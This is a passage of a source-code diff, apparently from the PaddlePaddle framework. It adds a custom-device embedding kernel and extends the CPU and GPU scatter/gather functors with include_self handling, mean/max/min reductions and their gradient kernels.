may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+ +#include "paddle/phi/kernels/c_embedding_kernel.h" +#include "glog/logging.h" +#include "paddle/phi/api/backward/backward_api.h" +#include "paddle/phi/api/include/api.h" +#include "paddle/phi/backends/all_context.h" +#include "paddle/phi/common/float16.h" +#include "paddle/phi/core/kernel_registry.h" + +namespace phi { + +#ifdef PADDLE_WITH_CUSTOM_DEVICE +template +void CEmbeddingKernel(const Context& dev_ctx, + const DenseTensor& w, + const DenseTensor& ids, + int64_t start_index, + int64_t vocab_size, + DenseTensor* out) { + const auto& index_type = ids.dtype(); + if (index_type == phi::DataType::INT32 || + index_type == phi::DataType::INT64) { + auto out_dims = out->dims(); + auto K = ids.numel(); + auto N = w.dims()[0]; + auto D = w.dims()[1]; + + auto x_tmp = std::make_shared(); + x_tmp->ShareDataWith(ids).Resize({K}); + auto w_tmp = std::make_shared(); + w_tmp->ShareDataWith(w).Resize({N, D}); + paddle::Tensor x_tensor(x_tmp), w_tensor(w_tmp); + + auto start_index_tensor = paddle::experimental::full_like( + x_tensor, start_index, x_tensor.dtype(), x_tensor.place()); + auto end_index_tensor = paddle::experimental::full_like( + x_tensor, start_index + N, x_tensor.dtype(), x_tensor.place()); + auto ids_mask_tensor = paddle::experimental::logical_and( + x_tensor.greater_equal(start_index_tensor), + x_tensor.less_than(end_index_tensor)); + auto ids_tensor = (x_tensor - start_index_tensor) + .multiply(paddle::experimental::cast( + ids_mask_tensor, x_tensor.dtype())); + auto out_tensor = + paddle::experimental::reshape( + paddle::experimental::cast(ids_mask_tensor, w_tensor.dtype()), + {K, 1}) + .multiply(paddle::experimental::reshape( + paddle::experimental::embedding( + ids_tensor, w_tensor, -1, false), + {K, D})); + out->ShareDataWith( + *reinterpret_cast(out_tensor.impl().get())) + .Resize(out_dims); + } else { + PADDLE_THROW(phi::errors::Unavailable( + "Custom Device c_embedding ids only support int32 or int64.")); + } +} +#endif +} // namespace phi + +#ifdef PADDLE_WITH_CUSTOM_DEVICE +PD_REGISTER_KERNEL(c_embedding, + Custom, + ALL_LAYOUT, + phi::CEmbeddingKernel, + float, + phi::dtype::float16, + phi::dtype::bfloat16) {} +#endif diff --git a/paddle/phi/kernels/funcs/CMakeLists.txt b/paddle/phi/kernels/funcs/CMakeLists.txt index f2d43a19a246d6..3b63d4f2ab407a 100644 --- a/paddle/phi/kernels/funcs/CMakeLists.txt +++ b/paddle/phi/kernels/funcs/CMakeLists.txt @@ -15,6 +15,9 @@ if(WITH_GPU OR WITH_ROCM OR WITH_MUSA) "*.cu") endif() +if(WITH_ROCM) + list(REMOVE_ITEM func_cu_srcs "weight_only_gemv.cu") +endif() if(WITH_MUSA) list(REMOVE_ITEM func_cu_srcs "softmax.cu") diff --git a/paddle/phi/kernels/funcs/gather_scatter_functor.cc b/paddle/phi/kernels/funcs/gather_scatter_functor.cc index 7be86351c47ff6..ca6c44dbdbd761 100644 --- a/paddle/phi/kernels/funcs/gather_scatter_functor.cc +++ b/paddle/phi/kernels/funcs/gather_scatter_functor.cc @@ -48,6 +48,24 @@ class ReduceMultiply { }; static ReduceMultiply reduce_mul; +class ReduceMax { + public: + template + void operator()(tensor_t* self_data, tensor_t* src_data) const { + *self_data = *src_data > *self_data ? *src_data : *self_data; + } +}; +static ReduceMax reduce_max; + +class ReduceMin { + public: + template + void operator()(tensor_t* self_data, tensor_t* src_data) const { + *self_data = *src_data < *self_data ? 
*src_data : *self_data; + } +}; +static ReduceMin reduce_min; + template @@ -55,10 +73,11 @@ struct cpu_gather_scatter_functor { template void operator()(phi::DenseTensor self, int dim, - const phi::DenseTensor& index UNUSED, + const phi::DenseTensor& index, const phi::DenseTensor& src, - const std::string& method_name UNUSED, + const std::string& method_name, const func_t& reduce_op, + bool include_self, const phi::DeviceContext& ctx UNUSED) { if (index.numel() == 0) { return; @@ -96,6 +115,7 @@ struct cpu_gather_scatter_functor { outer_dim_size_src *= src_dims[i]; } int64_t index_idx = 0; + std::vector nums_of_elements(self.numel(), 0); // N layer loop squeezed into 3 layers loop for (int64_t i = 0; i < inner_dim_size; i++) { for (int64_t j = 0; j < select_dim_size; j++) { @@ -132,12 +152,31 @@ struct cpu_gather_scatter_functor { replace_index_src = k + index * outer_dim_size_src + i * outer_dim_size_src * src_select_dim_size; } - reduce_op((tensor_t*)(self_data + replace_index_self), // NOLINT - (tensor_t*)(src_data + replace_index_src)); // NOLINT + if (include_self == false && + nums_of_elements[replace_index_self] == 0) { + self_data[replace_index_self] = src_data[replace_index_src]; + } else { + reduce_op((tensor_t*)(self_data + replace_index_self), // NOLINT + (tensor_t*)(src_data + replace_index_src)); // NOLINT + } + nums_of_elements[replace_index_self] += 1; index_idx++; } } } + if (method_name == "scatter_mean_cpu") { + for (int i = 0; i < self_size; i++) { + if (nums_of_elements[i]) { + if (include_self) { + self_data[i] = + self_data[i] / static_cast(nums_of_elements[i] + 1); + } else { + self_data[i] = + self_data[i] / static_cast(nums_of_elements[i]); + } + } + } + } } }; @@ -146,11 +185,18 @@ void cpu_gather_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor result, + bool include_self, const phi::DeviceContext& ctx) { cpu_gather_scatter_functor()( - result, dim, index, self, "gather_out_cpu", tensor_assign, ctx); + /*is_scatter_like=*/false>()(result, + dim, + index, + self, + "gather_out_cpu", + tensor_assign, + include_self, + ctx); } template @@ -158,11 +204,18 @@ void cpu_scatter_assign_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor src, + bool include_self, const phi::DeviceContext& ctx) { cpu_gather_scatter_functor()( - self, dim, index, src, "scatter_assign_cpu", tensor_assign, ctx); + /*is_scatter_like=*/true>()(self, + dim, + index, + src, + "scatter_assign_cpu", + tensor_assign, + include_self, + ctx); } template @@ -170,11 +223,12 @@ void cpu_scatter_add_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor src, + bool include_self, const phi::DeviceContext& ctx) { cpu_gather_scatter_functor()( - self, dim, index, src, "scatter_add_cpu", reduce_add, ctx); + self, dim, index, src, "scatter_add_cpu", reduce_add, include_self, ctx); } template @@ -182,11 +236,51 @@ void cpu_scatter_mul_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor src, + bool include_self, + const phi::DeviceContext& ctx) { + cpu_gather_scatter_functor()( + self, dim, index, src, "scatter_mul_cpu", reduce_mul, include_self, ctx); +} + +template +void cpu_scatter_mean_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + phi::DenseTensor src, + bool include_self, + const phi::DeviceContext& ctx) { + cpu_gather_scatter_functor()( + self, dim, index, src, "scatter_mean_cpu", reduce_add, include_self, ctx); +} + +template +void 
cpu_scatter_max_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + phi::DenseTensor src, + bool include_self, + const phi::DeviceContext& ctx) { + cpu_gather_scatter_functor()( + self, dim, index, src, "scatter_max_cpu", reduce_max, include_self, ctx); +} + +template +void cpu_scatter_min_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + phi::DenseTensor src, + bool include_self, const phi::DeviceContext& ctx) { cpu_gather_scatter_functor()( - self, dim, index, src, "scatter_mul_cpu", reduce_mul, ctx); + self, dim, index, src, "scatter_min_cpu", reduce_min, include_self, ctx); } template @@ -194,6 +288,7 @@ void cpu_scatter_input_grad_kernel(phi::DenseTensor self UNUSED, int dim, const phi::DenseTensor& index, phi::DenseTensor grad, + bool include_self UNUSED, const phi::DeviceContext& ctx UNUSED) { auto* index_data = index.data(); auto* grad_data = grad.data(); @@ -229,11 +324,135 @@ void cpu_scatter_input_grad_kernel(phi::DenseTensor self UNUSED, } } +template +void cpu_scatter_mul_min_max_input_grad_kernel(phi::DenseTensor self UNUSED, + int dim, + const phi::DenseTensor& index, + const phi::DenseTensor& out, + const phi::DenseTensor& x, + const phi::DenseTensor& value, + phi::DenseTensor grad, + const std::string& reduce, + bool include_self UNUSED, + const phi::DeviceContext& ctx) { + auto* index_data = index.data(); + auto* grad_data = grad.data(); + auto* out_data = out.data(); + auto* x_data = x.data(); + auto* value_data = value.data(); + + int64_t grad_size = grad.numel(); + auto index_dims = index.dims(); + auto grad_dims = grad.dims(); + auto value_dims = value.dims(); + + int64_t inner_dim_size = 1; + int64_t outer_dim_size = 1; + int64_t outer_dim_size_grad = 1; + int64_t outer_dim_size_value = 1; + int64_t select_dim_size = index_dims[dim]; + int64_t grad_select_dim_size = grad_dims[dim]; + int64_t value_select_dim_size = value_dims[dim]; + for (int i = 0; i < dim; ++i) { + inner_dim_size *= index_dims[i]; + } + + for (int i = dim + 1; i < index_dims.size(); i++) { + outer_dim_size *= index_dims[i]; + outer_dim_size_grad *= grad_dims[i]; + outer_dim_size_value *= value_dims[i]; + } + + int64_t index_idx = 0; + std::vector num_elements(grad_size, 0); + for (int64_t i = 0; i < inner_dim_size; i++) { + for (int64_t j = 0; j < select_dim_size; j++) { + for (int64_t k = 0; k < outer_dim_size; k++) { + int64_t index = index_data[index_idx]; + int64_t replace_index_grad = + k + index * outer_dim_size_grad + + i * outer_dim_size_grad * grad_select_dim_size; + if ((reduce == "multiply" || reduce == "mul") && + num_elements[replace_index_grad] == 0) { + grad_data[replace_index_grad] = static_cast( + grad_data[replace_index_grad] * out_data[replace_index_grad] / + x_data[replace_index_grad]); + num_elements[replace_index_grad] += 1; + } else if (reduce == "amin" || reduce == "amax") { + if (out_data[replace_index_grad] != x_data[replace_index_grad]) { + grad_data[replace_index_grad] = 0; + } else { + int64_t replace_index_value = + k + j * outer_dim_size_value + + i * outer_dim_size_value * value_select_dim_size; + if (out_data[replace_index_grad] == value_data[replace_index_value]) + num_elements[replace_index_grad] += 1; + } + } + index_idx++; + } + } + } + if (reduce == "amin" || reduce == "amax") { + for (int64_t i = 0; i < grad_size; i++) { + grad_data[i] = grad_data[i] / static_cast(num_elements[i] + 1); + } + } +} + +template +void cpu_scatter_mean_input_grad_kernel(phi::DenseTensor self UNUSED, + int dim, + const 
phi::DenseTensor& index, + phi::DenseTensor grad, + bool include_self UNUSED, + const phi::DeviceContext& ctx UNUSED) { + auto* index_data = index.data(); + auto* grad_data = grad.data(); + + auto index_dims = index.dims(); + auto grad_dims = grad.dims(); + + int64_t grad_size = grad.numel(); + + int64_t inner_dim_size = 1; + int64_t outer_dim_size = 1; + int64_t outer_dim_size_data = 1; + int64_t select_dim_size = index_dims[dim]; + int64_t grad_select_dim_size = grad_dims[dim]; + for (int i = 0; i < dim; ++i) { + inner_dim_size *= index_dims[i]; + } + + for (int i = dim + 1; i < index_dims.size(); i++) { + outer_dim_size *= index_dims[i]; + outer_dim_size_data *= grad_dims[i]; + } + + int64_t index_idx = 0; + std::vector num_elements(grad_size, 0); + for (int64_t i = 0; i < inner_dim_size; i++) { + for (int64_t j = 0; j < select_dim_size; j++) { + for (int64_t k = 0; k < outer_dim_size; k++) { + int64_t index = index_data[index_idx]; + int64_t replace_index = k + index * outer_dim_size_data + + i * outer_dim_size_data * grad_select_dim_size; + num_elements[replace_index] += 1; + index_idx++; + } + } + } + for (int64_t i = 0; i < grad_size; i++) + if (num_elements[i]) + grad_data[i] = grad_data[i] / static_cast(num_elements[i] + 1); +} + template void cpu_scatter_value_grad_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor grad, + bool include_self UNUSED, const phi::DeviceContext& ctx UNUSED) { auto* self_data = self.data(); auto* index_data = index.data(); @@ -244,11 +463,75 @@ void cpu_scatter_value_grad_kernel(phi::DenseTensor self, auto grad_dims = grad.dims(); int64_t self_size = self.numel(); - int64_t grad_size = grad.numel(); - bool* is_self_grad_used = new bool[self_size]; + std::vector is_self_grad_used(self_size, false); + + int64_t inner_dim_size = 1; + int64_t outer_dim_size = 1; + int64_t outer_dim_size_self = 1; + int64_t outer_dim_size_grad = 1; + int64_t select_dim_size = index_dims[dim]; + int64_t self_select_dim_size = self_dims[dim]; + int64_t grad_select_dim_size = grad_dims[dim]; + for (int i = 0; i < dim; ++i) { + inner_dim_size *= index_dims[i]; + } + + for (int i = dim + 1; i < index_dims.size(); i++) { + outer_dim_size *= index_dims[i]; + outer_dim_size_self *= self_dims[i]; + outer_dim_size_grad *= grad_dims[i]; + } + int64_t index_idx = index.numel() - 1; + for (int64_t i = inner_dim_size - 1; i >= 0; i--) { + for (int64_t j = select_dim_size - 1; j >= 0; j--) { + for (int64_t k = outer_dim_size - 1; k >= 0; k--) { + int64_t index = index_data[index_idx]; + int64_t replace_index_self = + k + index * outer_dim_size_self + + i * outer_dim_size_self * self_select_dim_size; + int64_t replace_index_grad = + k + j * outer_dim_size_grad + + i * outer_dim_size_grad * grad_select_dim_size; + if (!is_self_grad_used[replace_index_self]) { + grad_data[replace_index_grad] = self_data[replace_index_self]; + is_self_grad_used[replace_index_self] = true; + } + index_idx--; + } + } + } +} + +template +void cpu_scatter_add_mean_value_grad_kernel( + phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + const phi::DenseTensor& out UNUSED, + const phi::DenseTensor& x UNUSED, + const phi::DenseTensor& value UNUSED, + phi::DenseTensor grad, + const std::string& reduce, + bool include_self, + const phi::DeviceContext& ctx UNUSED) { + auto* self_data = self.data(); + auto* index_data = index.data(); + auto* grad_data = grad.data(); + + auto index_dims = index.dims(); + auto self_dims = self.dims(); + auto grad_dims = grad.dims(); - 
for (int i = 0; i < self_size; i++) { - is_self_grad_used[i] = false; + int64_t self_size = self.numel(); + int64_t grad_size = grad.numel(); + std::vector num_elements; + if (reduce == "mean") { + for (int i = 0; i < self_size; i++) { + if (include_self) + num_elements.push_back(1); + else + num_elements.push_back(0); + } } int64_t inner_dim_size = 1; @@ -267,10 +550,25 @@ void cpu_scatter_value_grad_kernel(phi::DenseTensor self, outer_dim_size_self *= self_dims[i]; outer_dim_size_grad *= grad_dims[i]; } - int64_t index_idx = index.numel() - 1; for (int i = 0; i < grad_size; i++) { grad_data[i] = static_cast(0); } + int64_t index_idx = index.numel() - 1; + if (reduce == "mean") { + for (int64_t i = inner_dim_size - 1; i >= 0; i--) { + for (int64_t j = select_dim_size - 1; j >= 0; j--) { + for (int64_t k = outer_dim_size - 1; k >= 0; k--) { + int64_t index = index_data[index_idx]; + int64_t replace_index_self = + k + index * outer_dim_size_self + + i * outer_dim_size_self * self_select_dim_size; + num_elements[replace_index_self] += 1; + index_idx--; + } + } + } + index_idx = index.numel() - 1; + } for (int64_t i = inner_dim_size - 1; i >= 0; i--) { for (int64_t j = select_dim_size - 1; j >= 0; j--) { for (int64_t k = outer_dim_size - 1; k >= 0; k--) { @@ -281,23 +579,131 @@ void cpu_scatter_value_grad_kernel(phi::DenseTensor self, int64_t replace_index_grad = k + j * outer_dim_size_grad + i * outer_dim_size_grad * grad_select_dim_size; - if (!is_self_grad_used[replace_index_self]) { + if (reduce == "add") grad_data[replace_index_grad] = self_data[replace_index_self]; - is_self_grad_used[replace_index_self] = true; - } + else if (reduce == "mean") + grad_data[replace_index_grad] = + self_data[replace_index_self] / + static_cast(num_elements[replace_index_self]); index_idx--; } } } - delete[] is_self_grad_used; } -Instantiate_Template_Function(cpu_gather_kernel) - Instantiate_Template_Function(cpu_scatter_assign_kernel) - Instantiate_Template_Function(cpu_scatter_add_kernel) - Instantiate_Template_Function(cpu_scatter_mul_kernel) - Instantiate_Template_Function(cpu_scatter_input_grad_kernel) - Instantiate_Template_Function(cpu_scatter_value_grad_kernel) +template +void cpu_scatter_mul_min_max_value_grad_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + const phi::DenseTensor& out, + const phi::DenseTensor& x, + const phi::DenseTensor& value, + phi::DenseTensor grad, + const std::string& reduce, + bool include_self, + const phi::DeviceContext& ctx) { + auto* self_data = self.data(); + auto* index_data = index.data(); + auto* grad_data = grad.data(); + auto* out_data = out.data(); + auto* x_data = x.data(); + auto* value_data = value.data(); + + auto index_dims = index.dims(); + auto self_dims = self.dims(); + auto grad_dims = grad.dims(); + + int64_t self_size = self.numel(); + std::vector num_elements; + if (reduce == "amin" || reduce == "amax") { + for (int i = 0; i < self_size; i++) { + num_elements.push_back(0); + } + } + int64_t inner_dim_size = 1; + int64_t outer_dim_size = 1; + int64_t outer_dim_size_self = 1; + int64_t outer_dim_size_grad = 1; + int64_t select_dim_size = index_dims[dim]; + int64_t self_select_dim_size = self_dims[dim]; + int64_t grad_select_dim_size = grad_dims[dim]; + for (int i = 0; i < dim; ++i) { + inner_dim_size *= index_dims[i]; + } + + for (int i = dim + 1; i < index_dims.size(); i++) { + outer_dim_size *= index_dims[i]; + outer_dim_size_self *= self_dims[i]; + outer_dim_size_grad *= grad_dims[i]; + } + int64_t index_idx = 0; + for 
(int64_t i = 0; i < inner_dim_size; i++) { + for (int64_t j = 0; j < select_dim_size; j++) { + for (int64_t k = 0; k < outer_dim_size; k++) { + int64_t index = index_data[index_idx]; + int64_t replace_index_self = + k + index * outer_dim_size_self + + i * outer_dim_size_self * self_select_dim_size; + int64_t replace_index_grad = + k + j * outer_dim_size_grad + + i * outer_dim_size_grad * grad_select_dim_size; + if ((reduce == "amin" || reduce == "amax") && + out_data[replace_index_self] == value_data[replace_index_grad]) { + num_elements[replace_index_self] += 1; + } else if (reduce == "mul" || reduce == "multiply") { + grad_data[replace_index_grad] = + self_data[replace_index_self] * + (out_data[replace_index_self] / value_data[replace_index_grad]); + } + index_idx++; + } + } + } + if (reduce == "amin" || reduce == "amax") { + index_idx = 0; + for (int64_t i = 0; i < inner_dim_size; i++) { + for (int64_t j = 0; j < select_dim_size; j++) { + for (int64_t k = 0; k < outer_dim_size; k++) { + int64_t index = index_data[index_idx]; + int64_t replace_index_self = + k + index * outer_dim_size_self + + i * outer_dim_size_self * self_select_dim_size; + int64_t replace_index_grad = + k + j * outer_dim_size_grad + + i * outer_dim_size_grad * grad_select_dim_size; + if (out_data[replace_index_self] == value_data[replace_index_grad]) { + if (out_data[replace_index_self] == x_data[replace_index_self]) + grad_data[replace_index_grad] = + self_data[replace_index_self] / + static_cast(num_elements[replace_index_self] + 1); + else + grad_data[replace_index_grad] = + self_data[replace_index_self] / + static_cast(num_elements[replace_index_self]); + } + index_idx++; + } + } + } + } +} + +Instantiate_Template_Function(cpu_gather_kernel) // NOLINT + Instantiate_Template_Function(cpu_scatter_assign_kernel) // NOLINT + Instantiate_Template_Function(cpu_scatter_add_kernel) // NOLINT + Instantiate_Template_Function(cpu_scatter_mul_kernel) // NOLINT + Instantiate_Template_Function(cpu_scatter_mean_kernel) // NOLINT + Instantiate_Template_Function(cpu_scatter_max_kernel) // NOLINT + Instantiate_Template_Function(cpu_scatter_min_kernel) // NOLINT + Instantiate_Template_Function(cpu_scatter_input_grad_kernel) // NOLINT + Instantiate_Template_Function(cpu_scatter_value_grad_kernel) // NOLINT + Instantiate_Template_Function_With_Out( + cpu_scatter_mul_min_max_input_grad_kernel) // NOLINT + Instantiate_Template_Function(cpu_scatter_mean_input_grad_kernel) // NOLINT + Instantiate_Template_Function_With_Out( + cpu_scatter_add_mean_value_grad_kernel) // NOLINT + Instantiate_Template_Function_With_Out( + cpu_scatter_mul_min_max_value_grad_kernel) // NOLINT } // namespace funcs } // namespace phi diff --git a/paddle/phi/kernels/funcs/gather_scatter_functor.cu b/paddle/phi/kernels/funcs/gather_scatter_functor.cu index cbe866d4924d54..865b1d74e36c34 100644 --- a/paddle/phi/kernels/funcs/gather_scatter_functor.cu +++ b/paddle/phi/kernels/funcs/gather_scatter_functor.cu @@ -15,6 +15,7 @@ limitations under the License. 
*/ #include "paddle/phi/kernels/funcs/gather_scatter_functor.h" #include "paddle/phi/backends/gpu/gpu_context.h" #include "paddle/phi/backends/gpu/gpu_primitives.h" +#include "paddle/phi/kernels/funcs/math_function.h" namespace phi { namespace funcs { @@ -46,14 +47,58 @@ static ReduceAdd reduce_add; class ReduceMul { public: - template + template < + typename tensor_t, + std::enable_if_t::value>* = nullptr> + __device__ void operator()(tensor_t* self_data, tensor_t* src_data) const { + phi::CudaAtomicMul(self_data, *src_data); + } + template ::value>* = nullptr> __device__ void operator()(tensor_t* self_data, tensor_t* src_data) const { *self_data *= *src_data; - // TODO(huangxu96) platform::CudaAtomicMul(*self_data, *src_data); } }; static ReduceMul reduce_mul; +class ReduceMax { + public: + template < + typename tensor_t, + std::enable_if_t::value>* = nullptr> + __device__ void operator()(tensor_t* self_data, tensor_t* src_data) const { + phi::CudaAtomicMax(self_data, *src_data); + } + template ::value>* = nullptr> + __device__ void operator()(tensor_t* self_data, tensor_t* src_data) const { + *self_data = *src_data > *self_data ? *src_data : *self_data; + } +}; +static ReduceMax reduce_max; + +class ReduceMin { + public: + template < + typename tensor_t, + std::enable_if_t::value>* = nullptr> + __device__ void operator()(tensor_t* self_data, tensor_t* src_data) const { + phi::CudaAtomicMin(self_data, *src_data); + } + template ::value>* = nullptr> + __device__ void operator()(tensor_t* self_data, tensor_t* src_data) const { + *self_data = *src_data < *self_data ? *src_data : *self_data; + } +}; +static ReduceMin reduce_min; + +__global__ void CudaMemsetAsync(int* dest, int value, size_t size) { + int tid = threadIdx.x + blockIdx.x * blockDim.x; + if (tid * sizeof(int) >= size) return; + dest[tid] = value; +} + template = numel) return; - extern __shared__ int thread_ids[]; - - if (tid == 0) { - for (int i = 0; i < numel_data; i++) { - thread_ids[i] = 0; - } - } - __syncthreads(); int64_t i, j, k; // The i, j, k here is the index of the 3 layers loop // squeezed from the N layers loop. /* tid = i * select_dim_size * outer_dim_size + j * outer_dim_size + k */ @@ -143,9 +181,19 @@ __global__ void GatherScatterGPUKernel(tensor_t* self_data, int64_t outer_dim_size_src, int64_t numel, int64_t numel_data, - const func_t& reduce_op) { + bool include_self, + const func_t& reduce_op, + int* shared_mem) { int tid = threadIdx.x + blockIdx.x * blockDim.x; if (tid >= numel) return; + if (include_self == false) { + if (tid == 0) { + for (int i = 0; i < numel_data; i++) { + shared_mem[i] = numel + 1; // thread_ids + } + } + __syncthreads(); + } int64_t i, j, k; // The i, j, k here is the index of the 3 layers loop // squeezed from the N layers loop. 
/* tid = i * select_dim_size * outer_dim_size + j * outer_dim_size + k */ @@ -182,9 +230,95 @@ __global__ void GatherScatterGPUKernel(tensor_t* self_data, replace_index_src = k + index * outer_dim_size_src + i * outer_dim_size_src * src_select_dim_size; } + bool is_op_done = false; + if (include_self == false) { + phi::CudaAtomicMin(shared_mem + replace_index_self, tid); + __syncthreads(); + if (tid == shared_mem[replace_index_self]) { + self_data[replace_index_self] = src_data[replace_index_src]; + is_op_done = true; + } + __syncthreads(); + } + if (!is_op_done) + reduce_op(static_cast(self_data + replace_index_self), + static_cast(src_data + replace_index_src)); +} +template +__global__ void ScatterMeanGPUKernel(tensor_t* self_data, + int dim, + const index_t* index_data, + tensor_t* src_data, + int select_dim_size, + int self_select_dim_size, + int src_select_dim_size, + int64_t outer_dim_size, + int64_t outer_dim_size_self, + int64_t outer_dim_size_src, + int64_t numel, + int64_t numel_data, + bool include_self, + const func_t& reduce_op, + int* shared_mem) { + int tid = threadIdx.x + blockIdx.x * blockDim.x; + if (tid >= numel) return; + + int64_t i, j, k; // The i, j, k here is the index of the 3 layers loop + // squeezed from the N layers loop. + /* tid = i * select_dim_size * outer_dim_size + j * outer_dim_size + k */ + i = tid / (select_dim_size * outer_dim_size); + int64_t remind = tid % (select_dim_size * outer_dim_size); + j = remind / outer_dim_size; + k = remind % outer_dim_size; + index_t index = index_data[tid]; + /* + gather computation formula: + + self[i][j][k] = src[index[i][j][k]][j][k] # if dim == 0 + self[i][j][k] = src[i][index[i][j][k]][k] # if dim == 1 + self[i][j][k] = src[i][j][index[i][j][k]] # if dim == 2 + + scatter computation formula: + + self[index[i][j][k]][j][k] = src[i][j][k] # if dim == 0 + self[i][index[i][j][k]][k] = src[i][j][k] # if dim == 1 + self[i][j][index[i][j][k]] = src[i][j][k] # if dim == 2 + + */ + // index matrix has different shape with self matrix or src matrix. + int64_t replace_index_self, replace_index_src; + if (is_scatter_like) { + replace_index_self = k + index * outer_dim_size_self + + i * outer_dim_size_self * self_select_dim_size; + + replace_index_src = k + j * outer_dim_size_src + + i * outer_dim_size_src * src_select_dim_size; + } else { + replace_index_self = tid; + + replace_index_src = k + index * outer_dim_size_src + + i * outer_dim_size_src * src_select_dim_size; + } + if (include_self == false) { + self_data[replace_index_self] = 0; + __syncthreads(); + } reduce_op(static_cast(self_data + replace_index_self), static_cast(src_data + replace_index_src)); + + phi::CudaAtomicMax(shared_mem + replace_index_self, tid); + phi::CudaAtomicAdd(shared_mem + numel_data + replace_index_self, 1); + __syncthreads(); + + if (tid == shared_mem[replace_index_self]) { + self_data[replace_index_self] = + self_data[replace_index_self] / + static_cast(shared_mem[replace_index_self + numel_data]); + } } template (ctx).stream(); + DenseTensor shared_mem_tensor; if (method_name == "scatter_assign_gpu") { - int shared_mem_size = - is_scatter_like ? 
sizeof(int) * self_size : sizeof(int) * index_size; + shared_mem_tensor.Resize({self_size}); + ctx.Alloc(&shared_mem_tensor); + phi::funcs::set_constant(ctx, &shared_mem_tensor, 0); + + int* shared_mem = shared_mem_tensor.data(); ScatterAssignGPUKernel - <<>>(self_data, - dim, - index_data, - src_data, - select_dim_size, - self_select_dim_size, - src_select_dim_size, - outer_dim_size, - outer_dim_size_self, - outer_dim_size_src, - index_size, - self_size, - reduce_op); + <<>>(self_data, + dim, + index_data, + src_data, + select_dim_size, + self_select_dim_size, + src_select_dim_size, + outer_dim_size, + outer_dim_size_self, + outer_dim_size_src, + index_size, + self_size, + reduce_op, + shared_mem); + } else if (method_name == "scatter_mean_gpu") { + shared_mem_tensor.Resize({self_size * 2}); + ctx.Alloc(&shared_mem_tensor); + if (include_self) { + int64_t grid_memset = (self_size * 2 + block - 1) / block; + phi::funcs::set_constant(ctx, &shared_mem_tensor, 1); + } else { + phi::funcs::set_constant(ctx, &shared_mem_tensor, 0); + } + + int* shared_mem = shared_mem_tensor.data(); + ScatterMeanGPUKernel + <<>>(self_data, + dim, + index_data, + src_data, + select_dim_size, + self_select_dim_size, + src_select_dim_size, + outer_dim_size, + outer_dim_size_self, + outer_dim_size_src, + index_size, + self_size, + include_self, + reduce_op, + shared_mem); } else { + int* shared_mem = nullptr; + if (include_self == false) { + shared_mem_tensor.Resize({self_size}); + ctx.Alloc(&shared_mem_tensor); + phi::funcs::set_constant(ctx, &shared_mem_tensor, index_size + 1); + + shared_mem = shared_mem_tensor.data(); + } GatherScatterGPUKernel <<>>(self_data, dim, @@ -265,7 +440,9 @@ struct gpu_gather_scatter_functor { outer_dim_size_src, index_size, self_size, - reduce_op); + include_self, + reduce_op, + shared_mem); } } }; // struct gpu_gather_scatter_functor @@ -275,11 +452,18 @@ void gpu_gather_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor result, + bool include_self, const phi::DeviceContext& ctx) { gpu_gather_scatter_functor()( - result, dim, index, self, "gather_out_gpu", tensor_assign, ctx); + /*is_scatter_like=*/false>()(result, + dim, + index, + self, + "gather_out_gpu", + tensor_assign, + include_self, + ctx); return; } @@ -288,11 +472,18 @@ void gpu_scatter_assign_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor src, + bool include_self, const phi::DeviceContext& ctx) { gpu_gather_scatter_functor()( - self, dim, index, src, "scatter_assign_gpu", tensor_assign, ctx); + /*is_scatter_like=*/true>()(self, + dim, + index, + src, + "scatter_assign_gpu", + tensor_assign, + include_self, + ctx); } template @@ -300,11 +491,12 @@ void gpu_scatter_add_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor src, + bool include_self, const phi::DeviceContext& ctx) { gpu_gather_scatter_functor()( - self, dim, index, src, "scatter_add_gpu", reduce_add, ctx); + self, dim, index, src, "scatter_add_gpu", reduce_add, include_self, ctx); } template @@ -312,11 +504,51 @@ void gpu_scatter_mul_kernel(phi::DenseTensor self, int dim, const phi::DenseTensor& index, phi::DenseTensor src, + bool include_self, + const phi::DeviceContext& ctx) { + gpu_gather_scatter_functor()( + self, dim, index, src, "scatter_mul_gpu", reduce_mul, include_self, ctx); +} + +template +void gpu_scatter_mean_kernel(phi::DenseTensor self, + int dim, + const phi::DenseTensor& index, + phi::DenseTensor src, + bool include_self, + const 
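The per-slot bookkeeping array is now a regular device tensor instead of dynamic shared memory; one plausible reason is that an array with one entry per output element can easily exceed what a single block may request as shared memory. A minimal CUDA sketch of the same pattern, using plain cudaMalloc for the scratch buffer (sizes and names are illustrative):

#include <cstdio>
#include <cuda_runtime.h>

__global__ void FillCounts(int* counts, int value, int n) {
  int tid = blockIdx.x * blockDim.x + threadIdx.x;
  if (tid < n) counts[tid] = value;   // one element per output slot
}

int main() {
  // A per-output-slot counter array can be arbitrarily large, so it lives
  // in global memory rather than in the limited shared memory of a block.
  const int num_slots = 1 << 20;
  int* counts = nullptr;
  cudaMalloc(&counts, num_slots * sizeof(int));

  const int block = 512;
  const int grid = (num_slots + block - 1) / block;
  FillCounts<<<grid, block>>>(counts, /*value=*/1, num_slots);
  cudaDeviceSynchronize();

  int first = 0;
  cudaMemcpy(&first, counts, sizeof(int), cudaMemcpyDeviceToHost);
  printf("counts[0] = %d\n", first);  // expect 1
  cudaFree(counts);
  return 0;
}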
